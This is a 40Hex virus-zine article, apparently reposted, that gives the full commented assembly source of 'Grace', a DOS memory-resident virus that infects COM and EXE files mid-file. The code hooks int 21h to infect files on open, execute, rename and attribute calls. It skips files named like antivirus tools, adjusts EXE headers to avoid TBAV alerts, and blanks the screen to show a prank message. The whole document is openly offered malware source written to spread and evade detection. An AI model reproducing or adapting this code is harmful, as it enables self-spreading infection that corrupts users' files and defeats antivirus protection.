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40Hex Issue 14 File 009

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 · 3 months ago

40Hex Number 14 Volume 5 Issue 1                                      File 009 

; Grace
; Mid-file COM/EXE TSR infector, 1294 bytes
; This virus employs a brand new infection mechanism such that virus
; scanners which only check the entry points will fail. ie. heuristics
; are (so far) worthless against this virus. However this opens the virus
; up to signature scanning vulnerability because the entry point code
; is fixed and very specific. The next version of this virus will feature
; a general architectural reconstruction, multiple-block displacement
; and also polymorphism, so keep your eyes peeled for that one.
; I know there has been another virus which has done mid-file infection
; (Commander Bomber) but that uses a different method which achieves
; a similar result (ie, infection in the middle of the host). However
; the implementation illustrated in this virus is a more simple
; rendition of the idea, it simply has a 'wrapper' which relocates blocks
; etc. into the appropriate positions before the virus proper gains
; control. Cmdr Bomber, on the other hand, inserts multiple polymorphic
; jumps, but only infects .com files.
; This code is getting on (about 8 months) and has a few drawbacks. It
; just took too much stuffing around writing it that I didn't want to
; change it! :> .. for example the abovementioned susceptibility to sig
; scanning.. also the relocation of the entire header information to the
; end of the exe file (lame..) which requires heaps more memory than the
; average virus and suspicious extra disk accesses. Also, it was written
; to be compiled with a86 [1988] so the stuff at the end I had to count up
; manually. So I don't use TASM, and dont do my tabs right.. that's my
; problem. :> ..If I'd known how much mucking around this virus would
; have taken to write before I'd written it, I wouldn't have bothered.
; But I didn't, so I did, and here's the final product. It works! ;)
; There's a lot of commenting on this thing (left over from a tutorial I
; did for someone) so it's not *too* difficult to understand if you are
; taking a stroll through the code.. it's also pretty modular and some parts
; have just been fitted in without much optimization (eg the filename
; and extension checking routine could have been redone because there's only
; 2 allowable extensions).
; Apart from residing around the middle of the host it's pretty much just
; your standard virus.. it infects COM/EXE files on open, attrib, exec,
; move, and extended open.. also on program termination via function 4ch
; there's a chance the happy message "Have a nice DOS!" or "Have a nice
; piss-up!" will appear after blanking the screen. I personally hate
; programs which think they're being humourous with this little number, so
; there you go.. have fun.
; -T„L”N 02/95-
; when you run it, run it with a debugger, at the entry point to the actual
; virus (ie not the relocation wrapper) needs PSP in BP, and virus offset
; in memory in DI .. ie 100h if you're executing the kernal. in other
; words, there's no way this virus can be 'accidentally' compiled and
; run, because it will crash unless you do the above step..
; Some equates and stuff for use within the virus ..

org 0 ; will be assembled with start of 0

@JO equ 070h ; JO operand for variable branch
@JMPS equ 0ebh ; JMP SHORT
@tsrchk equ 6968h ; our tsr check
p_len equ 5120/16 ; amount of memory we take up
@marker equ 'PK' ; marker for infected file
load equ 1536 ; scratch area offset
vstack equ 1536 ; ceiling for our own stack .. = load
k_len equ 52 ; length of relocation code
ek_len equ 36 ; length of extra relocation code
s_len equ 48 ; length of temp EXE stack


; assumes DI points to virus start
; ES = PSP
v_start: push di
mov cx, cs
mov ax, @tsrchk ; int 21h will return an error
int 21h ; unless our virus is already TSR
xor bx, ax ; is bx xor ax = 0 ?? (will be if TSR)
jz bail ; jump if zero to a bail routine
; otherwise install ourselves TSR.

mov ax, bp ; in segment PSP-1 is the MCB chain.
dec ax ; We will edit that to get us some
; memory to hide in.

memloop: mov ds, ax ; set data segment
cmp byte ptr [0], 'Z' ; is it the last block?
je fixmem
mov bx, ax ; keep segment of prev. block
add ax, word ptr [3] ; AX now equals seg of next MCB
inc ax
jmp short memloop ; and check it ..

fixmem: cmp word ptr [3], p_len*10 ; is block too small?
jae fm_ok
mov ds, bx ; yeah, use previous block
xchg ax, bx
fm_ok: sub word ptr [3], p_len ; steal the memory we need
add ax, word ptr [3] ; get its segment value
inc ax
mov word ptr [12h], ax ; and feed it to the PSP of
; the host program - otherwise
; will crash

mov es, ax ; ES = destination segment for
push cs ; the move..
pop ds ; DS = source segment
xor di, di
push cx
mov cx, v_len ; # of bytes to move
cld ; forward direction...
rep movsb ; move CX bytes ds:si -> es:di
pop cx
gethi: push es ; push dest. seg on stack
mov ax, offset dms ; and the offset of where to go
push ax
retf ; and jump there.

dms: xor ax, ax
mov ds, ax
mov si, 21h*4 ; offset of int 21h vector
movsw ; mov word from DS:SI to ES:DI
movsw ; and again
sub si, 4
mov word ptr [si], offset new21 ; revector int 21h
mov word ptr [si+2], cs

; we have saved the old int 21h value so we can still jump to it, and we have
; put our offset and segment in its place -- so every time an int 21h call
; is issued, control is passed to the virus. Now let's split.

xor si, si ; zero si since we've relocated
bail: mov es, bp ; restore to ES the PSP segment
push cs ; and let DS be our CS
pop ds
add si, offset old_shit ; point SI to our old data
gl: jo exit_exe ; JO changed to JMP in EXE
mov di, 0100h ; COMs always start execution
add sp, 2
push bp ; at PSP:100h
push di
movsw ; restore host's original 5
jmp short zero_shit ; split
exit_exe: add bp, 10h
add ax, bp
xchg ax, bx
pop di
relo_stuff: mov ss, bx
xchg ax, sp
lodsw ; now get the starting address
xchg ax, bx ; from where we've stored it.
add ax, bp
mov ds, cx
xchg si, di ; DS:SI = relocation table
push ax ; push exe CS:IP onto stack...
push bx
lodsw ; # of relocation items
xchg cx, ax
jcxz rldone
relo_loop: lodsw ; relocate them...
xchg ax, di
add ax, bp
mov es, ax
add word ptr es:[di], bp
loop relo_loop
rldone: sub bp, 10h
zero_shit: xor ax, ax ; clean our hands
mov bx, ax
mov cx, ax
mov si, ax
mov di, ax
mov ds, bp ; DS=ES=PSP ..
mov es, bp
mov bp, ax ; everything = 0...
retf ; I didn't see nothin!

old_shit: int 20h ; 4 words to store either the
dw 0,0,0 ; old EXE header values or the
; old COM header info.

db '-[Grace] by T„L”N 94-'

; end of installation routine.
; The 'Have a nice DOS!' or 'Have a nice piss-up!' effect.

hahaha: in al, 40h
cmp al, 0e0
jbe ha_ex
push bx
push dx
push ds
mov ah, 0fh
int 10h ; get video mode
xor ah, ah
int 10h ; clear that mode's screen
mov ah, 2
xor dx, dx
int 10h
push cs
pop ds
mov ah, 9
mov dx, offset msg ; print the msg
call i21
in al, 40h
xchg ah, al
in al, 40h
xor al, ah
cmp al, 0a0h
jbe nicedos
mov dx, offset XXXX
jmp short prp
nicedos: mov dx, offset doss
prp: mov ah, 9
call i21
pop ds
pop dx
pop bx
ha_ex: jmp short yeppo

db 'You make me sick I make viruses'


new21: cmp ax, @tsrchk ; is it us checking residence?
jne n2
mov bx, ax ; yep, make BX = AX
iret ; and return from interrupt.
n2: push ax
xchg ah, al
cmp al, 3dh ; OPEN?
je letsgo
cmp al, 43h ; ATTRIB?
je letsgo
cmp al, 4bh ; EXEC?
je letsgo
cmp al, 4ch ; EXIT?
je hahaha
cmp al, 56h ; RENAME?
je letsgo
cmp al, 6ch ; EXT_OPEN?
jne yeppo
push dx
mov dx, si
call infect
pop dx
jmp short yeppo
letsgo: call infect ; call the infection routine
yeppo: pop ax ; restore AX
n21_2: jmp dword ptr cs:[old21] ; and act as if nothing's up

new24: mov al, 3 ; a cool critical error handler

file_end: mov ax, 4202h ; some internal virus functions
jmp short seek_vals
file_zero: mov ax, 4200h
seek_vals: xor cx, cx
xor dx, dx
i21: pushf ; simulate an int 21h
push cs
call n21_2

; the working horse of the virus.

infect: push ax ; save all the registers
push bx ; that we'll be screwing with
push cx
push dx
push si
push di
push ds
push es

; now, we need to save the name of the file we're dealing with at a permanent
; location so that it's easier to reference. We also need to check to see if
; it's an invalid filename (ie. contains SC (eg Scan), CL (clean) etc etc.).

push cs
pop es
mov di, offset filename
mov si, dx ; on all the above calls,
; DS:DX points to the filename.
; we put it in SI for the LODSB
; instruction.
storename: lodsb ; [DS:SI] -> AL
stosb ; AL -> [ES:DI]
or al, al ; is it 0 (end of ASCIIZ string)?
jnz storename ; if not, keep going

push cs ; toss out old data segment,
pop ds ; we don't need it now.

; now we check the name and the extension.
; [this could do with a rewrite]..

mov dx, di
sub dx, 4 ; DX points to extension
lea si, [di-12] ; SI = DI - 12
cmp si, offset filename+1 ; is it too far back?
jae kkk1
mov si, offset filename+1 ; yep, point it right
kkk1: dec si
cmp si, dx ; is SI up to extension yet?
je kkk2
lodsw ; no, check the word at SI...
and ax, 0dfdfh ; capitalize the letters
push di
mov di, offset fucks
mov cx, @fucks ; 4 things to check for...
repne scasw ; this is:
; "keep comparing AX to [ES:DI]
; while AX <> [ES:DI] or until
; CX = 0. ie find if AX matches
; any of the disallowed things.
pop di
jne kkk1 ; try next 2 if no match..
jmp short ncexit_err ; otherwise we don't infect.

kkk2: mov di, offset exts ; valid extensions
mov cx, @exts
and ax, 0dfdfh ; -> uppercase
extchk: scasw ; does AX match extension?
je extchk_2
inc di ; nope, try next extension
loop extchk ; loop until cx=0
ncexit_err: jmp bitch ; .. if not valid extension,
; terminate infection routine

extchk_2: lodsb ; otherwise check 3rd byte
and al, 0dfh
jne ncexit_err

; set int 24h to our own so we don't get annoying "Write protect error" etc.

set24: mov ax, 3524h ; get int 24h vector
call i21
push es ; save it on the stack
push bx
mov dx, offset new24
mov ax, 2524h ; set int 24h vector
call i21
push cs
pop es

; now set the file attributes to zero...

setattrib: mov ax, 4300h ; AX=4300h, Get attribs of file
mov dx, offset filename ; DS:DX, filename
call i21
push cx ; them..
mov ax, 4301h
xor cx, cx
call i21 ; and zero them out.
jc bitch1 ; if error, bail ...

; now we can safely open the file.

mov ax, 3d02h ; open file, read/write access
call i21
xchg ax, bx ; put file handle into bx
mov ax, 5700h ; get the file's date/time
call i21
push cx
push dx

; check to see if the file is a COM or an EXE, according to its hdr structure.

call file_zero ; seek to beginning of file
mov ah, 3fh
mov cx, 26
mov dx, offset signature
call i21 ; read 24 bytes (header info)

xor ax, cx ; bail if < 26 bytes read
jnz bitch2

mov ax, @marker ; is there an infection marker?
cmp word ptr [signature+3], ax ; [com]
je bitch2 ; yep, it's already infected
cmp word ptr [chksum], ax ; [exe]
je bitch2

mov si, dx
cmp al, 'M' ; EXEs start with MZ or ZM
je goexe
cmp al, 'Z'
je goexe
call cominf ; otherwise it's a COM file
jmp short write_hdr
goexe: call exeinf
write_hdr: call file_zero ; seek to start of file
mov ah, 40h
mov cx, 26
mov dx, offset signature
call i21 ; write patched header

bitch2: pop dx ; restore the file's date/time
pop cx
mov ax, 5701h
call i21

mov ah, 3eh ; and close it.
call i21

bitch1: pop cx ; restore file's original
mov ax, 4301h ; file attributes
mov dx, offset filename
call i21

pop dx ; get original i24h
pop ds
mov ax, 2524h
call i21 ; and reinstate it

bitch: pop es ; restore all the registers...
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
ret ; and exit the infect routine.

cominf: mov di, offset old_shit
movsw ; save first 5 bytes
call file_end
or dx, dx ; COM >64k?
jnz com_done
cmp ax, 0f800h ; COM >60k?
jae com_done
push ax
mov byte ptr [gl], @JO
mov word ptr [k1+1], 0
; we need a random value between 5 and (eof-v_len)
sub ax, (v_len)+5
jc com_done2
call rnd_num
add ax, 105h ; DX:AX is file offset of virus
mov word ptr [k2+1], ax
dec ah
push ax
call file_end
add ax, v_len + k_len + 100h
mov word ptr [k3+1], ax
pop ax
call write_us
mov di, offset signature
mov al, 0e9h ; now build us a JMP
pop ax
dec ax ; ...
dec ax
dec ax
mov ax, @marker ; put in the infection marker
com_done: ret
com_done2: pop ax

; this EXE infection is quite exhaustive in order to screw up the least amount
; of EXE files possible. A virus shows itself up when it wrecks things ..
; therefore it makes sense not to wreck things, hmm?

exeinf: ; we have to check for internal overlays
; if present, don't infect the file
call file_end
push ax ; check for internal overlays
push dx
mov ax, word ptr [page_cnt] ; calculate how big the code
mov cx, 512 ; part of the EXE is, according
mul cx ; to its header info ...
pop cx
pop bp
cmp ax, bp ; and compare it to the actual
jb com_done ; file's size.
cmp dx, cx ; if calc<actual then it must have
jb com_done ; internal overlays -- bail.

; store the old SS:SP, CS:IP

mov di, offset old_shit
mov si, offset relo_ss

; append k_code to EOF & find a block to move as well...

call file_end
mov byte ptr [gl], @JMPS
mov cx, 10h ; # of paragraphs in whole file
div cx
sub ax, word ptr [hdr_size] ; except the header
mov word ptr [relo_cs], ax
dec ax
mov word ptr [relo_ss], ax
mov word ptr [exe_ip], dx
push dx
xchg ax, dx
add ax, v_len + ek_len + k_len
mov word ptr [k3+1], ax
mov word ptr [ek1+1], ax

; the minmem/maxmem stuff is not really necessary to the
; viability of infection, but TBAV screams if the header
; isn't perfect. One less thing for TBAV to pick up...

mov ax, -10240/16 ; a -ve value to save code
cmp word ptr [minmem], ax ; (hehe is 10k enough??)
jae di0
sub word ptr [minmem], ax ; subtract -ve = add
di0: cmp word ptr [maxmem], ax
jae dont_inc
sub word ptr [maxmem], ax
dont_inc: pop ax
add ax, v_len + ek_len + k_len + s_len + 10h
mov cx, word ptr [relocnt]
shl cx, 1
shl cx, 1
add ax, cx
shr ax, 1 ; make SP even
shl ax, 1
mov word ptr [exe_sp], ax

call file_end ; calculate the size of the file
push dx ; minus the header
push ax
mov ax, word ptr [hdr_size]
mov dx, 10h
mul dx
mov word ptr [hdr], ax
mov word ptr [hdr+2], dx
pop ax
sub ax, word ptr [hdr]
pop dx
sbb dx, word ptr [hdr+2]
sub ax, v_len
sbb dx, 0
call rnd_num ; & select a random # in that range
push ax
push dx
mov cx, 10h
div cx
add ax, 10h
mov word ptr [k1+1], ax
mov word ptr [k2+1], dx
pop dx
pop ax
add ax, word ptr [hdr]
adc dx, word ptr [hdr+2]
call write_us

mov cx, 512 ; calculate new # of code pages
div cx
or dx, dx ; any bits left over?
jz fp2
inc ax ; yes, inc # pages
fp2: mov word ptr [part_page], dx ; update the info
mov word ptr [page_cnt], ax
mov word ptr [chksum], @marker ; tag as infected

write_us: ; calling parameters:
; k1, k2 and k3 have been taken care of
; DX:AX contains file offset of part to save & overwrite
; this routine was once simple, but programming nightmares
; caused it to get cancerous outgrowths.
; (although i prefer not to call my programming a cancerous
; outgrowth)...
mov cx, dx
xchg ax, dx
mov ax, 4200h
call i21 ; seek to this area
push ax
push dx
mov dx, offset load
mov cx, v_len
push cx
push dx
mov ah, 3fh
call i21 ; read old contents
call file_end
mov cx, k_len
mov dx, offset k_kode
jc wu2
; deviation for exe files
add cx, ek_len
mov dx, offset ek_kode
wu2: mov ah, 40h
call i21 ; write the entry beast
pop dx
pop cx
mov ah, 40h
call i21 ; write the displaced code
pop cx
pop dx
mov ax, 4200h
call i21 ; seek to area we got it from
mov ah, 40h
mov cx, v_len
xor dx, dx
call i21 ; & write over it with ourself
call file_end
jc wuret
; write the EXE header to EOF
mov ah, 40h
mov cx, 2
mov dx, offset relocnt
call i21
xor cx, cx
mov dx, word ptr [tabloff]
mov ax, 4200h
call i21 ; seek to reloc'n table start
mov cx, word ptr [relocnt]
shl cx, 1
shl cx, 1
jcxz reloend

move_reloc: push bp ; moves the relocation table
push ax ; to EOF...
push dx
mov ax, 3072 ; = size of blocks to move
mov bp, ax ; (3k at a time)
cmp cx, ax
jb mr2
mov word ptr [mr1+1], ax
sub cx, ax
pop dx
pop ax
add ax, bp
adc dx, 0
push ax
push dx
push cx
jmp $+2 ; clear the prefetch queue
mr1: mov cx, 0
mr2: mov ah, 3fh
mov dx, offset load
push dx
call i21
push ax
call file_end
pop cx
mov ah, 40h
pop dx
call i21
pop cx
jcxz reloend2
mov bp, cx
pop cx
pop dx
mov ax, 4200h
call i21
mov cx, bp
pop bp
jmp short move_reloc
reloend2: pop bp
pop bp
reloend: mov word ptr [relocnt], 0
call file_end
mov ah, 40h
mov cx, s_len
call i21 ; add a stack
call file_end
wuret: ret ; and return.

rnd_num: ; calling parameters:
; DX:AX contains dword, highest # allowed
; returns:
; DX:AX the selected offset
; CX destroyed
push dx
push ax
xor ax, ax ; get an arbitrary number
int 1ah
xchg cx, dx
pop ax
pop dx
or dx, dx ; is DX:AX <64k?
jnz rn2
rn1: cmp ax, cx ; is denominator bigger than
jnb rn2 ; the numerator?
shr cx, 1
jmp short rn1
rn2: div cx ; divide DX:AX by CX
mul cx ; and multiply again
ret ; (got rid of remainder)

; data ..

msg db 'Have a nice $'
XXXX db 'piss-up!',0d,0a,'$' ; sink some XXXX ales..
doss db 'DOS!',0d,0a,'$'

fucks db 14h,'DCOSCCLVSF-' ; invalid words in filename
;^^^ this is '4' AND 0DFh, to fit in with capitalization routine
@fucks equ ($-fucks)/2

exts db 'COMEXE' ; valid extensions
@exts equ ($-exts)/3


; This is the actual entry point of the infected file.
; Its job is to relocate the actual virus from elsewhere in the file
; and patch up the area where the virus was with the old data.

ek_kode: mov bp, ds ;2 ; this is only written on EXE infection
push cs ;1
pop ds ;1
push cs ;1
pop es ;1
ek1: mov si, 0 ;3 ; same as k3
lodsw ;1 ; first word = # of relocation items
shl ax, 1 ;2
shl ax, 1 ;2
add si, ax ;2
lea di, [si+v_len] ;4 ; where to reloc'n items to
lea sp, [di+s_len+10h] ;3
push ax ;1
xchg ax, cx ;1
std ;1
jcxz ekdone ;2
rep movsb ;2 ; move the relocation table
movsb ;1
ekdone: movsb ;1
movsb ;1
cld ;1
mov ds, bp ;2

k_kode: mov ax, ds ;2
mov bp, ax ;2
k1: add ax, 0 ;3 ; seg displacement of virus code
mov ds, ax ;2
k2: mov si, 0 ;3 ; ofs displacement of virus code
push cs ;1
pop es ;1
k3: mov di, 0 ;3 ; where we want to move it
mov cx, v_len ;3
rep movsb ;2
push ds ;1 ; now we restore the old data
push es ;1
pop ds ;1 ; exchange the segments
pop es ;1
xchg si, di ;2 ; and pointers
mov ax, v_len ;3
sub si, ax ;2 ; and adjust them
sub si, ax ;2
push si ;1
sub di, ax ;2
xchg ax, cx ;1
push cx ;1
rep movsb ;2
push cs ;1 ; now it's done.. make segs ours..
pop es ;1
pop cx ;1
pop di ;1
rep movsb ;2 ; copy virus code to v_end...
jmp $+2 ;2 ; and clear processor's prefetch queue
xchg si, di ;2 ; si points to virus code
; di points to relocation info
;52 bytes

; data which needn't be carried around when the virus spreads.

old21 equ $

hdr equ old21 + 4 ; store for calc'd length of EXE header
reloc equ hdr + 4 ; temp store for relocation data in EXE
signature equ reloc + 4 ; where we load the host file's header
part_page equ signature + 2 ; part-page at EOF ((this is for EXE header))
page_cnt equ part_page + 2 ; count of code pages
relocnt equ page_cnt + 2 ; # of relocation items in table
hdr_size equ relocnt + 2 ; size of header in paragraphs
minmem equ hdr_size + 2 ; minimum memory required
maxmem equ minmem + 2 ; maximum memory required
relo_ss equ maxmem + 2 ; displacement of stack segment (SS)
exe_sp equ relo_ss + 2 ; stack pointer (SP)
chksum equ exe_sp + 2 ; infection marker in EXEs
exe_ip equ chksum + 2 ; instruction pointer (IP)
relo_cs equ exe_ip + 2 ; displacement of code segment (CS)
tabloff equ relo_cs + 2 ; offset of EXE relocation table
; 26 bytes for EXE header
oldss equ tabloff + 2
oldsp equ oldss + 2
filename equ oldsp + 2 ; filename of target file

v_len equ v_end - v_start

; the end.

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